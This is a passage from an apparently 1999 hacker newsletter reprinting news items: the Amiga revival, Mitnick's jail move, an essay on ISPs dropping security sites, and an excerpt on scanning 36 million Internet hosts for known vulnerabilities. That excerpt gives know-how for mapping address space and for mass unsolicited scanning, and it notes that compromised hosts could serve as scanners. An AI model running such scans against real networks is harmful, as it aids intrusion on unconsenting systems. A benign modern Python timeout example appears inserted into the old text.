     technology in the form of modern tactical data links (is) one of the most important tools to suppressing friendly fire. That's just
     one of the places where in our studies and in our war games, we can see the payoffs of information technology.

     Q - How much have things changed since the last all-out war in the Persian Gulf?

     A - The Persian Gulf War, looking back, quite frankly looks quite a bit like the Stone Age. I was commanding the USS Midway,
     where we had two telephones with off-ship capability. And it's hard to imagine that today. Some of our aircraft carriers have a
     thousand seats (for communicating). The quality of planning can go up a great deal, and you can plan much faster. For example,
     to put together a plan for fleet movement, a major evolution would frequently take a day or two. Now that kind of planning is
     done in an hour or even less. It's no longer plan, then execute -- it's plan while executing.

     Q - And the billion-dollar question: Are these systems ready for Y2K?

     A - I don't think we'll have a hiccup in Y2K as far as military systems.


     Contact Shashank Bengali at sbengali@sjmercury.com or (408) 920-5066.
     
     @HWA
     
     
28.0 Gateway plans for Amiga 
     ~~~~~~~~~~~~~~~~~~~~~~~
     From HNN http://www.hackernews.com/      

      contributed by M1r0rB4lls 
      Gateway is finally doing something with the 47 Amiga
      patents it bought several years ago. They aren't
      planning on introducing a new PC but instead want to
      use the technology to create info appliances. 

      MSNBC     
      http://www.msnbc.com/news/299752.asp
      
      Gateway to revive Amiga
      for information appliances
                                                           By Gary McWilliams
                                                        THE WALL STREET JOURNAL

      Aug. 12 -- Two years ago, PC maker Gateway Inc.
      acquired the rights to the personal-computer
      industry's most famous cult product, the Amiga
      PC. The Amiga made its debut in 1985, and still
      has fans, partly as a result of a James Dean-like
      history: a rapid rise, then a tragic end.
      
     GATEWAY PAID ABOUT $13 MILLION for 47
     Amiga patents, including those for important multimedia
     techniques. The San Diego PC maker's original plan was to
     use the patents as a bargaining chip in royalty negotiations
     with other PC makers. "It was a treasure chest," says Joe
     Torre, a former Amiga Inc. hardware engineer.
            Now, Gateway is aiming to revive the Amiga in a bold
     move to set standards for the next era in computing. It
     quietly has set up and staffed a new Amiga Inc. subsidiary
     to cobble together low-cost "information appliances" for the
     Internet, based on Amiga technology, that can be linked like
     home-stereo components to add features.
            "There's a new computer revolution on the horizon that
     has to do with making computers a natural part of everyday
     life," says James Collas, the Amiga unit's president and a
     former Gateway executive. He says the unit will craft
     everything from digital-music players and game machines to
     wireless tablets that link to the Internet. Its first products
     could arrive early next year and be priced from about $100
     for game players to $1,000 for PC servers.
            Gateway will pit its tiny subsidiary against PC kingpins
     such as Microsoft Corp. and consumer-electronics
     companies such as Sony Corp. and Philips Electronics NV,
     which also are developing new-age information devices.
     Mr. Collas says Amiga will license its designs to
     consumer-electronics makers to promote technologies that
     can be embraced far beyond its parent.
            It could use all the help he can muster. Early entrants in
     the computer-consumer electronics convergence market,
     such as WebTV, were gobbled up quickly by the giants
     (Microsoft bought WebTV). Even for a company with $7.5
     billion in sales, the risks are high for Gateway. "It's
     becoming a battle for the big boys," says Sean Kaldor, a
     researcher at International Data Corp. 

            How much of the new Amiga will come from its past
     isn't known. Mr. Collas has recruited designers from
     Amiga's heyday along with software specialists from Silicon
     Graphics Inc. and Apple Computer Inc. Amiga, he says,
     will operate independently from its parent, and be free to
     strike its own agreements. Mr. Collas wouldn't say if
     Gateway plans to spin off the subsidiary. A Gateway
     spokesman declined to comment.
            Among the San Diego division's first products will be a
     new Amiga PC that Mr. Collas says is aimed to bring
     Amiga PC software writers back into the fold. Next week,
     the company plans to release a new version of the Amiga
     operating system that provides access to the Internet.
            The Amiga is nothing if not resilient. It first appeared 14
     years ago as a spunky alternative to the IBM PC and
     Apple's Macintosh. Graphics and film enthusiasts flocked to
     the machine because of its ability to handle video and
     sound. Commodore Electronics Ltd. sold five million of the
     low-cost machines before the company's sudden demise.
     Even today, Hollywood animators and filmmakers still use
     the machines for generating special effects.
            Amiga went into decline after Commodore filed for
     bankruptcy in 1994, and stopped making the machines. The
     first attempt to resurrect Amiga came in 1995, when
     German computer maker Escom AG acquired the
     Commodore patents in a bidding contest with Dell
     Computer Corp. But, like Commodore, Escom filed for
     bankruptcy a year later, and manufacturing was halted
     again. Amiga devotees became scavengers, scouring online
     bulletin boards for used machines and add-on parts.
     Indeed, there are dozens of tiny companies still living off the
     Amiga accessory market. 

            If the new Amiga ever catches on, it will be an Amiga
     in name only for some of the machine's original devotees.
     Greg Scott, an Amiga fan who manages the computer
     systems for Archtech Inc., a computer firm in London,
     Ontario, says Gateway's plan to develop the
     next-generation Amiga PC using the free Linux operating
     software has raised the hackles of fans of the old Amiga.
     "It's nothing new," he says.
            Jason Compton, who owns an Amiga and once ran an
     online Amiga magazine, still believes nothing can match the
     original. "I've never seen a PC I've enjoyed more." He says
     the Gateway plan does little more than resurrect the Amiga
     name. "As far as I can tell, there's no connection" to the
     original technology, he says.
            Mr. Collas says such qualms are missing the spirit of
     the old Amiga. It isn't new technology that's needed so
     much as an innovative blending of existing technologies, he
     insists. Just as the Amiga PC's low cost and ease of use
     allowed owners to do multimedia work years ahead of the
     IBM PC, he says the new Amiga "will bring the information
     age to the common person."

            Copyright (c) 1999 Dow Jones & Company, Inc.
     All Rights Reserved.
                                  
    @HWA 
    
29.0 Mitnick Moved to County Jail 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     From HNN http://www.hackernews.com/      

      contributed by ryan 
      In a swiftly executed move Kevin Mitnick has been
      moved from the Metropolitan Detention Center - Los
      Angeles, to the San Bernardino County Jail.
      Unfortunately the SBC does not offer Kosher meals,
      since Kevin wishes to exercise his right to freedom of
      religion he has not eaten since his transfer late
      Wednesday afternoon. The defense lawyers will file a
      motion with the court for Kevin's immediate return to
      MDC-L.A. The SBC does allow visitors as long as 24
      hours notice is given. 

      FREE KEVIN    
      http://www.freekevin.com
     
     
      @HWA
      
      
30.0 The problem with ISP's and security sites
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
     
     From HNN http://www.hackernews.com/      
       
      contributed by CyberChrist 
      A simple email and a site disappears, maybe it was
      never there to begin with? ISPs with missing back
      bones, maybe they never had them? What is going on?
      Where have all the good security sites gone? 

      Buffer Overflow
      http://www.hackernews.com/orig/buffero.html
      
      Not found-- the problem with ISPs
                                        and security web sites


     CyberChrist
     cc@h0use.org
     "Sapere Aude"

     Over the last few months, there have been a rash of
     security-related web sites taken offline for a peculiar
     reason-- It seems that Internet Service Providers cave in
     to the demands of people objecting to the content of the
     site, or at times, the alleged content. Sites such as
     Packetstorm Security have been victim of people claiming
     that material that is posted on the web site is libelous and
     try to hold the service provider of the web site, such as
     the web hosting organization, for ransom by threatening
     them with lawsuits if they do not force the webmaster to
     change the content. Companies are more willing to just
     toss the offending site off of its servers and avoid any
     kind of threat of a lawsuit. However, this is not the way
     to deal with this problem, as there have been precedents
     set in American courts that deal specifically with these
     issues. 

     First, let's examine a bit as to how a "security expert" or a
     "hacker" is viewed by a typical ISP. Most ISPs have a
     service agreement, where one agrees to abide by their
     rules. These rules often lay out the rules as to what
     content is acceptable and not acceptable. Many of these
     ISPs forbid the posting of security information on their
     web servers, lumping "hacking" in with "pornography" and
     other perceived underground activities. This lumping of
     hacking with other, seedier activities is prevalent and is
     part of the problem. No matter what the credentials are of
     the person that is constructing the web site and no
     matter what his stated intentions are, and no matter how
     many disclaimers are posted on the site, web hosting
     companies and ISPs generally frown upon that kind of
     content. So part of the problem is that ISPs and web
     hosting companies are generally undereducated about the
     entire hacker culture, their brains fattened by the massive
     FUD articles posted in the media. 

     In their minds, security consultants==hackers=bad. 

     This leads to another problem-- there is always going to
     be someone out there that is jealous or mad about the
     content of another web site. The site may contain
     information such as "xyz said this and xyz is wrong and
     this is why." Sites such as these either start posting
     about each other, or worse, one webmaster just gets fed
     up with it and contacts someone that they feel can
     remedy the situation. Often this person forgets about the
     chain of command as far as reporting questionable
     material and goes straight for the throat by contacting
     the web site's upstream provider. This is becoming an
     increasing problem and the problem again lies in the fact
     that many of these fly-by-night web masters were not
     around during the infancy of the Internet (no, that does
     not mean that the infancy was when the web got
     started). There ARE rules of engagement and chains of
     command, and these have been outlined since the early
     80s and perhaps beyond, both in the form of RFCs and
     tradition. The way that complaints used to be handled is
     roughly as follows: 

     - send email to the system administrator of the offending
     system, calmly explaining the situation and maybe offer
     some evidence as to how this is causing harm. This could
     be due to content or due to other activity coming from
     the site, such as port scanning. Attaching logs usually
     helps a lot.
     - if you don't get a response in a reasonable amount of
     time, try re-sending the email. It may seem hard to
     believe, but sometimes mail gets lost.
     - if there is still no response, try doing a 'whois' on their
     domain name, and then try contacting them via the
     information provided. Usually you get names and
     telephone numbers and addresses at this point.
     - it is only when you have exhausted all of these
     measures and are getting no cooperation or hostile
     responses that you try to contact the upstream service
     provider. To find out who their upstream service provider
     is, try looking at the nameservers that are registered for
     the domain in the 'whois' command or try doing a
     traceroute and seeing who they have their connection
     from. 

     This is really common sense more than anything. Common
     sense apparently has gone out the window in the
     point-and-click world of the 1990s. 

     The last part of the puzzle is what happens when these
     two uneducated sides get together to decide what to do
     about someone that seems to know more than they do.
     More often than not, what happens is the illogical in that
     the offending party is tossed off the system or his
     upstream provider threatens to shut down the service.
     The cycle usually goes like this: 

     - siteA.com posts information that shows that information
     by lamerA is wrong. siteA.com pokes fun at him, generally
     ridicules him, and the cycle usually renews itself when
     lamerA says something else stupid (or publishes an idiotic
     book).
     - lamerA feels stung by all these statements and usually
     responds with weak defenses. Finally, the whole thing
     becomes unbearable and in the search of trying to get the
     activity to stop, he dashes to siteA.com's service provider
     and tells them that siteA.com has libelous material. lamerA
     threatens the service provider with a lawsuit or
     thereabouts.
     - siteA.com's provider panics, as they do not wish to be
     sued for libel (awards for this are usually extravagant and
     ISPs barely break even as it is). So they either remove
     the site or forcibly remove the content and send stern
     rebukes to siteA.com's administrator/user. 

     There are a lot of problems with this cycle. Obviously the
     chain of command is broken. But more importantly, due to
     lack of education on the ISP's part, they are not aware
     that U.S. courts have decided that ISPs are NOT liable for
     the content of their users. In November of 1998, the United
     States Court of Appeals in Florida ruled against a woman
     who sued America Online when one of its subscribers, a
     convicted sex offender, approached her 11-year-old son
     via an America Online chat group. The appeals court
     upheld a federal law that protects Internet service
     providers and online services from inappropriate online
     transmittals by subscribers. The verdict is being appealed
     to the United States Supreme Court. This decision also
     extends to web content. Rather than cite the case to the
     accuser, the service provider usually caves in quickly and
     pulls the plug. 

     There are many other cases that ISPs can cite in their
     defense. Zeran vs. America Online in 1998 was upheld by
     the U.S. Supreme Court. It stated simply that ISPs such
     as America Online are free from liability over material that
     is carried on their network. Furthermore, the Supreme
     Court stated that ISPs do not have a duty nor an
     obligation to remove material found to be offensive. The
     decision cited the Communications Decency Act of 1996,
     where ISPs are shown not to be publishers and thus are
     not treated as such by the law. 

     Another case is Cubby vs. Compuserve. In this case, the
     ruling cleared CompuServe of any wrongdoing based on
     the content of one of its subscribers, stating that ISPs
     such as CompuServe are secondary publishers, merely
     providing the means by which documents may be viewed
     and had no editorial control over any of the content
     published on its public web servers. At the most, it
     removes any kind of offensive material after complaints.
     Hence, it cannot be held liable for content since it had no
     previous knowledge of the content. 

     Interestingly enough, one of the key elements that can
     help protect security consultants from being run off from a
     service provider or that can help a service provider to deal
     with complaints is the Communications Decency Act of
     1996. It contains clear language that clearly states that
     "no provider or user of an interactive computer service
     shall be treated as a publisher or speaker of any
     information provided by another." The key is to realize
     that as a service provider being threatened with lawsuits
     over content that is found to be defamatory, your
     company is NOT liable for the content being published by
     one of your users. That is the law of the land and by
     citing these cases to any irate callers, you may be able to
     defuse the situation in a more diplomatic manner than just
     booting the offending site off your server or off your
     router. Remember that these laws also theoretically work
     in inverse-- if you boot users from your system without
     warning and you state that the material could get the ISP
     sued, you could be sued by the user you just booted for
     wrongful termination. And if the user can show loss of
     business over this wrongful termination, the ISP could
     have more problems in its hands than it bargained for. 

     It should be noted that although ISPs cannot be held
     liable, users of the system that are publishing the
     questionable information CAN be held liable. However, a
     clear case must be made in court to show that the
     information is erroneous and has caused emotional and
     financial distress to the plaintiff. 

     In conclusion, it has been shown that the problems that
     arise in today's trend of booting "questionable" security
     sites from servers or from routers arise mainly from a
     complete lack of education on all sides as to the way that
     these problems are to be approached. The problems are
     not only in the complete disregard of the
     chain-of-command in reporting a problem, but ultimately
     also lie in the total lack of education on the part of the
     ISP in knowing what its rights are as defined by the
     American Judicial System. ISPs of any kind seem quick to
     cave in to the demands of an irate complaint and do not
     seem to fully think of the situation at hand and think of
     the legal precedents of these kinds of complaints without
     executing a rash decision that does nothing but give other
     would-be-complainers hope that they can also get a web
     site or web server removed if they complain long enough
     to their provider. If the rash of sites being taken down by
     these uneducated people is to stop, then all sides need to
     be aware of the protocols that are involved in dealing with
     these problems and the legal cases that support their
     decisions. 

     -- CyberChrist cc@h0use.org
     "Sapere Aude" 
     
     @HWA

31.0 The Internet Auditing Project 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/      
     
     
      contributed by Aleph One 
      Security Focus has posted a very interesting report in
      their guest forum section. The folks at SSR went and
      scanned 36 million IPs, that was about 85% of the
      internet at the time, for 18 common security
      vulnerabilities. They came up with some rather scary
      results. The article also introduces the idea of the
      International Digital Defense Network (IDDN), a possible
      public interest project which, if implemented, could
      dramatically influence the security of the Internet. This
      is a must read for anyone even remotely interested in
      system security. 
      
      
      Security Focus
      http://www.securityfocus.com/templates/forum_message.html?forum=2&head=32&id=32
      
      The Internet Auditing Project
      by Liraz Siri <liraz@bigfoot.com>
      Wed Aug 11 1999 
     
      Download the BASS scanner source code. 
    
      Introduction 
    
      Today, when too many people think of security on the Internet, they think of individual hosts and networks. Alone. Got a problem?
      Damn! Must be those damn hacker punks. Again. Keep it to yourself. Call the Feds, call the New York Times. Make sure we don't get
      it. Didn't keep your systems patched? Moron. Don't make us sue you. 
    
      With the growing irrelevance of security organizations like CERT and law enforcement on the Internet, an ever growing number of
      attacks are handled in isolation. 
    
      Hundreds of millions of Internet users around the world have become accustomed to an Internet beyond boundaries. One site flows to
      the next, a jungle of software, protocols, media and people connecting, signal, noise, mixing, evolving, together. 
    
      It seems silly to ignore the security of the system _as a whole_, but we still do. A helpful analogy might be to consider the Internet
      more a living organism than a neighborhood. A security compromise can behave more like a disease than a "break-in". It is often
      contagious and can spread. Remotely exploitable security vulnerabilities are like the natural wounds of the skin. They are relatively
      rare, sometimes difficult to squirm through, but once inside, infection can begin. 
    
      This article describes the efforts of a small, independent, security research group to audit some 36 million hosts connected to the
      Internet, for commonly known security vulnerabilities in an unfocused low-res scan. 
    
      Why? 
    
      Because we're a curious bunch, because we've been speculating (rather academically) over the results for several years, and of
      course, because we can. 
    
      Why are we publishing now? Why haven't we published before? 
    
      We know other groups, working for everyone from the UKUSA SIGINT agencies, foreign intelligence, private corporations and
      organized crime are not likely, for many obvious reasons, to disclose any "privileged information" to the general public. We feel this is
      not A Good Thing, and would like to do what we can to help level the playing field. We don't have any money, resources or academic
      prestige to back us up, but we do have a few, humble insights to share, and we hope these can speak for themselves. 
    
      Besides, wouldn't it be a shame to keep all of our busy work to ourselves, when it could be reaching a much wider audience, sparking
      debate, and maybe even making a difference? 
    
      Up until now, a couple of issues have held us back. First of all, the timeless responsibility factor. We could not avoid the possibility
      (certainty?) that our work would be abused by malicious parties and we've all seen before how easy it is for people to point the finger. 
    
      Secondly, we've been busy and publishing involves a significant investment in time writing articles, cleaning code, reaching the
      potential audience and reading (sometimes answering) endless e-mails. 
    
      Walk forth in dread 
    
      So you want to scan the millions of computers on the Internet from Japan to Egypt to Florida? Reach out and audit the networks of
      Internet Service Providers, corporations, universities, government facilities, banks and sensitive military installations? 
    
      First, take another moment to think about it. 
    
      Many people get nervous on the receiving end of an uninvited security audit, and you'll eventually step on quite a few toes. In some
      countries, you can even expect unpleasant house-calls from local law enforcement which will brand you a criminal for your unusual
      efforts. Citizens of a large democracy with many three letter agencies should be aware that a fully-equipped SWAT team is likely to tag
      along. 
    
      While this may deter, possibly comfort law-abiding readers, a criminally inclined party is not without its options. Resources are
      abundant on the Internet, and many suitable, unsuspecting, high-bandwidth volunteers are not hard to find, with the modest help of
      your favorite bulk auditing software. 
    
      Not intimidated? That's the spirit! 
    
      Quick & Dirty Overview 
    
      Let's take a look at some of the basic ingredients we're going to need: 
        1. Some wheels. (BASS, a Bulk Auditing Security Scanner) 
        2. A map. (address search space) 
        3. Fuel. (resources) 
    
     Although they are not required, logistical management skills, competence and patience can also come in real handy. 
    
     Wheels 
    
     The Internet is getting rather big these days, and exploring its tens of millions of unique hosts is by no means an easy task. Manually, we
     could never get the job done. Fortunately, we can let a computer (or several) do most of the dirty work, allowing us to concentrate on
     coordination and management. 
    
     Assuming of course, we have the right software. In this case, we're going to need a robust bulk security scanner that can monotonously run
     for weeks, even months at a time, efficiently processing millions of addresses, generating gigabytes of traffic and surviving everything
     from broken routing, to system shutdowns and unfriendly sysadmins. 
    
     Since we've never liked re-inventing the wheel, the first thing we did, (circa Sep 1998) was take a look at existing scanning software. 
    
     We were disappointed. There was no shortage of software, from Satan, to Nessus, with a jungle of (often silly) cracker tools in between,
     but none of them would do. Nessus was impressive, but clearly not designed with bulk in mind. Most of the rest were unreliable, poorly
     written, slow and inextensible. Primitive, specialized scanners (foobar-scan) were also common, and equally useless. 
    
     So, it looked like we'd need to write "Yet Another Security Scanner" ourselves. 
    
     During development, we were careful not to complicate the design and code any more than we had to, aware of the many virtues of
     simplicity (especially in security software). Our goal was producing a scanner which was reliable, efficient and extensible. 
    
     After several weeks of on-off programming, the first alpha version of BASS, the Bulk Auditing Security Scanner, was ready for its first
     test run. Israel was the first target in a series of trials. 
    
     At this point (Sep-Oct 98) BASS could only identify 4 common security vulnerabilities, but adding more later was a simple matter. What we
     really needed to evaluate was how well the multi-threaded scanning architecture worked. 
    
     "beware the bugs that bite beta programs" 
    
     It didn't. Even with a small target like Israel, the scan came to a final halt after about 18,000 addresses. It seemed threads would
     occasionally freeze, waiting for service from a host they knew was online, but behind a misconfigured firewall, or a broken router. The
     frozen threads were rare but persistent. They would build up in BASS's scheduler over time, eventually choking the scanner to a grinding
     halt. 
    
     A fail-safe timeout circuit fixed the problem, and we tried again. This time, the scan finished on schedule. 110,000 addresses in under 4
     hours, on a dual ISDN 128k connection. 
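
     The freeze described above is what a blocking read does when a peer accepts a connection and then never answers. The
     following Python example is added here and is not BASS code: it bounds each read with one overall deadline so a small
     worker pool cannot be choked. The peers are constructed local socketpairs, and the names read_banner, make_peer and
     sweep are hypothetical.

```python
import socket
import threading
import time
from concurrent.futures import ThreadPoolExecutor


def read_banner(sock, deadline_s, limit=256):
    """Read one line (at most `limit` bytes) within `deadline_s` seconds overall.

    Returns (status, data); status is "ok", "overlong", "timeout", "closed"
    or "error". The socket is always closed before returning.
    """
    end = time.monotonic() + deadline_s
    buf = b""
    try:
        while b"\n" not in buf and len(buf) < limit:
            remaining = end - time.monotonic()
            if remaining <= 0:
                return ("timeout", buf)
            # The per-call timeout shrinks toward one overall deadline. A fixed
            # per-recv timeout would be reset by every byte a slow peer sends.
            sock.settimeout(remaining)
            chunk = sock.recv(limit - len(buf))
            if not chunk:
                return ("closed", buf)
            buf += chunk
        return ("ok" if b"\n" in buf else "overlong", buf)
    except socket.timeout:
        return ("timeout", buf)
    except OSError:
        return ("error", buf)
    finally:
        sock.close()


def make_peer(kind):
    """Constructed stand-in for a remote service, over a local socketpair.

    kind: "prompt" sends a banner at once, "silent" accepts and never speaks
    (the host behind a broken firewall), "dribble" sends one byte every 50 ms.
    """
    client, server = socket.socketpair()

    def serve():
        try:
            if kind == "prompt":
                server.sendall(b"220 constructed banner\n")
            elif kind == "dribble":
                while True:
                    server.sendall(b"x")
                    time.sleep(0.05)
            else:
                server.recv(1)  # blocks until the client gives up and closes
        except OSError:
            pass  # the client closed its end
        finally:
            server.close()

    threading.Thread(target=serve, daemon=True).start()
    return client


def sweep(kinds, deadline_s, workers=2):
    """Probe every peer with a small worker pool; return statuses in order."""
    peers = [make_peer(k) for k in kinds]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(lambda s: read_banner(s, deadline_s)[0], peers))


if __name__ == "__main__":
    kinds = ["prompt", "silent", "dribble", "prompt", "silent", "prompt"]
    start = time.monotonic()
    for kind, status in zip(kinds, sweep(kinds, deadline_s=0.3)):
        print(f"{kind:8s} -> {status}")
    print(f"finished in {time.monotonic() - start:.1f}s with 2 workers")
```

     Without the deadline, the two "silent" peers alone would occupy both workers forever and the remaining entries would
     never be read.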
    
     We selected the United Kingdom, with an address space of 1.4 million, for our next trial. If there were any further bugs, they were going to
     show, and they did. Around a million UK addresses later, BASS broke down and was dragging the entire system down with it. This time,
     several obscure memory leaks had slowly inflated BASS to monstrous proportions, consuming all available system memory. Several
     further painful debugging sessions were needed to bring the scanner up to par, during which 5 million addresses around the world had
     been scanned. 
    
     Now that the architecture was stable, we proceeded to familiarizing BASS with the wonders of CGI and RPC, allowing the scanner to test
     for up to 18 widely known security vulnerabilities (see detailed listing in suffix item 1). The tests were designed to reduce false positives
     and false negatives to a minimum, combining passive (server's version header) and interactive (server's response to ill-formed input: a
     buffer-overflow, sneaky characters) implementation signatures to determine vulnerability. 
    
     So now we could sit back, feed BASS a really big map of the Internet, and wait a few months (or weeks, depending on our resources) for
     results. 
    
     Download the BASS scanner source code. 
    
     A map. 
    
     - A map you say? 
    
     Yeah, well what I really mean is a really long list of "all" the computers connected to the Internet. Please note the term "all" is used loosely
     ("most" or the "majority" would probably be more accurate). 
    
     - How many of them are there anyway? 
    
     Reader, that's a tougher question than you might think. 
    
     An Internet Protocol address, or IP for short, is a 32 bit integer. This means there are 2^32 (4.3 billion) possible unique IPs, the IP
     address space. In practice, only a very small fraction of this space is really used. 
    
     Due to the anarchic nature of the Internet, nobody has any exact figures on usage statistics, but most estimates (circa Jan 1999) settle
     around 100 million users worldwide. The number of computers online is more around an order of magnitude lower (15 million). This is
     because most users still access the Internet dynamically, by dialup, over phone lines. ISPs (Internet Service Providers) can often manage
     to provide service with an address pool 4 to 10 times smaller than their customer base. 
    
     Ideally, since BASS is (currently) Unix oriented, we would like to eliminate any non-unix computers (not that non-unix's are any more
     secure, quite the contrary) from our Really Big List. We would also want to skip any dynamic IP pools. In a perfect world, this would be a
     good idea. In ours, eliminating poor scanning candidates in advance would actually take longer than the scan itself. Optimizing a scan this
     way is only useful if you plan on repeating it frequently. 
    
     - I'm confused, how many IPs are we going to end up scanning? 
    
     That depends... 
    
     In our case, we ended up scanning around 36 million IPs, which we estimate covered 85 percent of the active address space at the time.
    
     Keep in mind, however, that the Internet is growing very quickly, so these numbers will get bigger by the time you try this out yourself.
     Search for "Internet Surveys" on the web, and get an updated figure. 
    
     - Wait, what's with the 85 percent? 
    
     Calm down, mapping the entire used IP space is nearly impossible, even assuming you can agree with anyone else (try Usenet folks
     first!) on what "used" should mean. The main problem is that using an IP is an internal decision that organizations with an allocated slice of the
     address space make for themselves. All those slices add up to 300 million IP addresses, of which only 5 percent have a computer at the
     other end, so we need to narrow down our search space. 
    
     This is where the Domain Name System (DNS) comes to the rescue. The DNS is a tree structured lookup directory used (primarily) to
     map a hostname to an IP and vice-versa (www.nsa.gov <=> 208.212.172.33). By convention, most of the Internet's active addresses are
     registered with the DNS, although this is not a mandatory requirement. 
    
     - So we can just download the DNS's records from the Internet? 
    
     Yes, and no. The DNS protocol has an "AXFR zone transfer" mechanism designed to allow one DNS server to mirror the contents of
     another. By requesting an AXFR zone transfer, you can download a server's records. This is helpful in providing for redundant backups,
     should the primary server fail. Unfortunately, since the DNS is a distributed system, we can't just download its complete contents from any
     central authority. 
    
     To make matters worse, many DNS servers nowadays (40 percent) refuse zone transfer requests, due to several (misunderstood)
     concerns over its security implications. 
    
     - Sounds rough. 
    
     Well if you're going the do-it-yourself way, it's not going to be easy, but isn't as difficult as it sounds. 
    
     Let's take a look at some of our options (If you aren't the do-it-yourself type, skip to item 4): 
    
       1. A top-down recursive download of the DNS. 
    
          Using the DNS protocol's AXFR zone-transfer mechanism it is possible to recursively download the DNS's contents one zone at a
          time. In practice however, this method is usually reserved for mapping a known target that has not explicitly restricted
          zone-transfers. 
    
          Trying to map the DNS this way has the disadvantage of being slow, unreliable and incomplete. 
    
          A description of the process is available in RFC1296. 
    
       2. Exploiting in-addr.arpa. 
    
          We start off by recursively downloading the DNS's relatively small in-addr.arpa. domain. This will give us the allocated address
          space (300 million IPs). Most of the active addresses (the ones we want) in this space will have a PTR record somewhere in the
          in-addr.arpa domain. (so they can be mapped in reverse from IP numbers to hostnames). Many Internet protocols and applications
          rely on this pointer, by convention, so it is not likely to be absent on purpose. Unless the address isn't being used, of course, but
          we don't want any of those anyway. By checking to see which IPs in the allocated address space have a pointer in the
          in-addr.arpa. domain, we can narrow down the search space to about 13 percent (45 million IPs). 
    
          This process demonstrates that the ever popular practice of blocking zone-transfers will not hide a network's topology. People
          relying on this method to obscure their security problems are begging for trouble. 
    
          BTW, 'Network Wizards' are doing their Internet Survey this way, since the beginning of 1998, check them out. (http://www.nw.com/)
    
          The job is likely to take between a week, and a month (or several), depending on how much available bandwidth you have, and the
          quality of the software you're using to get it done. 
    
       3. Scavenging Network Information Centers for pre-compiled lists. 
    
          It turns out some NICs have precompiled data files available over anonymous FTP. Getting the data this way is much easier, faster
          and more reliable than slowly milking the DNS through the traditional AXFR zone-transfer protocol. 
    
          As of Nov 1998, RIPE (ftp.ripe.net) was offering raw output files from its recursive hostcount (Covering Europe, Russia and others.
          98 countries in total) for download at ftp://ftp.ripe.net/ripe/hostcount. 
    
          Update: On the 01/02/1999 they restricted anonymous FTP access to the raw hostcount output files. You now have to either
          convince RIPE you really need them at hostcount@ripe.net (for saving the world, no less) or grab them at one of RIPE's many
          mirrors. 
    
          Network Wizards, the guys doing the Internet Survey, offer (some) of the raw data from their older surveys, up to 1997, at
          "http://www.isc.org/ISC_HTML/domainsurvey/archive-data/". 
    
          ARIN (http://www.arin.net), the American Registry for Internet Numbers, is an interesting site to look into. While you're reading
          exciting new number policies, grab ftp.arin.net/domain/inaddr.zone over anonymous FTP. (doing a zone-transfer takes so much
          longer) 
    
          There are hundreds of NICs, structured hierarchically. Search the web for "Network Information Centers", and you'll find quite a few.
          APNIC (Asian Pacific) and JPNIC (Japan's NIC at NIC.ad.jp) are two you should really look into. 
    
          Then there's InterNIC, run by Network Solutions (NSI, the "dot com" guys), in charge of the root servers,
          ([A-M].ROOT-SERVERS.NET), at the root of Internet's DNS, all the three letter top level domains (com, net, org, edu, gov and mil)
          and the top level in-addr.arpa. domain (for reverse lookups). InterNIC is the closest thing the Internet has to a central authority on
          anything, and is currently being run as a lucrative for-profit US-government sanctioned monopoly. InterNIC no longer provides
          anonymous FTP access to most of its DNS records, with the exception of the top-level in-addr.arpa. domain, stating it is trying to
          prevent spammers and squatters (domain name speculators) from abusing the DNS. As such, InterNIC will only offer FTP access to
          "organizations that can demonstrate a technical need for the information". 
    
          Fortunately, the information is already out there, available on several anonymous FTP sites hosted by InterNIC affiliates
          (government, military, educational, etc.) who share its records, but do not enforce its censorship policies. 
    
          Personally, we downloaded the top level .com, .net, .org, .edu, .mil and .gov domains from ftp.nic.mil (the first NIC we tried) several
          minutes after a disappointing encounter with an almost empty 'domains' directory at ftp.internic.net. (Update: ftp.nic.mil no longer
          provides these records over anon FTP) 
    
       4. The Greener Path 
    
          The Internet Software Consortium (http://www.isc.org), of the bi-annual "Internet Survey", is offering its raw data sets for resale
          through MIDS, Matrix Information and Directory Services (http://www.mids.org) at $2500. 
    
          Frankly, shelling the green is a lot easier, faster and even less expensive than trying to compile the data yourself, especially if you
          don't already have the software, expertise and bandwidth to pull it off. 
    
     - What about you guys? What did you do? 
    
     We like banging our heads against the wall, so we went down the slippery do-it-yourself path. 
    
     We started off by learning as much as we could about the DNS, reading any RFCs that were relevant to the protocol, browsed through
     the documentation of its most popular implementation "BIND", downloaded a zoo of freely available DNS utilities from the major FTP sites
     and read lots of source code. 
    
     Eventually we ended up hacking a couple of popular DNS utilities, wrote way too many ugly shell scripts, C application wrappers, and
     some pretty silly Perl filters, mixing a lot of method 3 (scavenging), 2 (in-addr.arpa.) and just a bit of 1 (vanilla zone-transfers). 
    
     If you have any good sense, you'll do otherwise. 
    
     Fuel 
    
     Swarming the Internet with probes requires some resources, bandwidth mostly. How much of it you need depends on how flexible your
     schedule is. Generally speaking, you're likely to find you need a lot less of it than you might first imagine. 
    
     The good news is that scans are easy to parallelize, so you can divide the load over as many different computers and networks as you
     have access to, to either get the scan finished faster, or to consume fewer resources from each participating scanning node. This is
     similar logistically to the distributed computing effort used to break a cryptographic key challenge. The difference is that our effort
     consumes network bandwidth instead of CPU cycles, and is much much easier. 
    
     How much easier? (Assuming a search space of 40 million IPs...) 
    
     One workstation running BASS, with enough memory (to support hundreds of scanning threads), and a T3's equivalence in bandwidth,
     could probe the entire Internet in under a week at about 4500 JPM. (Jobs Per Minute, the scanner's schedule goal, set on the command
     line at the beginning of a scanning session, or during recovery). 
    
     At the other extreme, a small dispersed group, running BASS on 10 personal computers with dialup-strength connections, could probe the
     entire Internet in a month or so at a modest 90 JPM each. (around 2 kilobytes/second). 
    
     A minor detour, introducing IDDN. (the International Digital Defense Network) 
    
     All of this brings us to an interesting idea we've been playing around with that could dramatically influence Internet security for the good, if /
     when it is eventually implemented. Frankly, the idea deserves an article of its own, but since we are so busy, we will introduce it here. 
    
     Inspired by the high response to cryptographic key challenges, distributed.net and the SETI effort, we envision a non-profit foundation,
     which we like to ambitiously call IDDN, the International Digital Defense Network, working in the public interest to organize massively
     distributed scanning efforts which routinely probe the Internet for security vulnerabilities. 10,000 participants could finish a scan cycle
     every 2-3 days at an insignificant, single JPM each. At the end of a cycle, an automated system could draw the attention of administrators
     worldwide to some of their local security problems, and offer whatever information and solutions (bug-fixes, patches, workarounds) it has
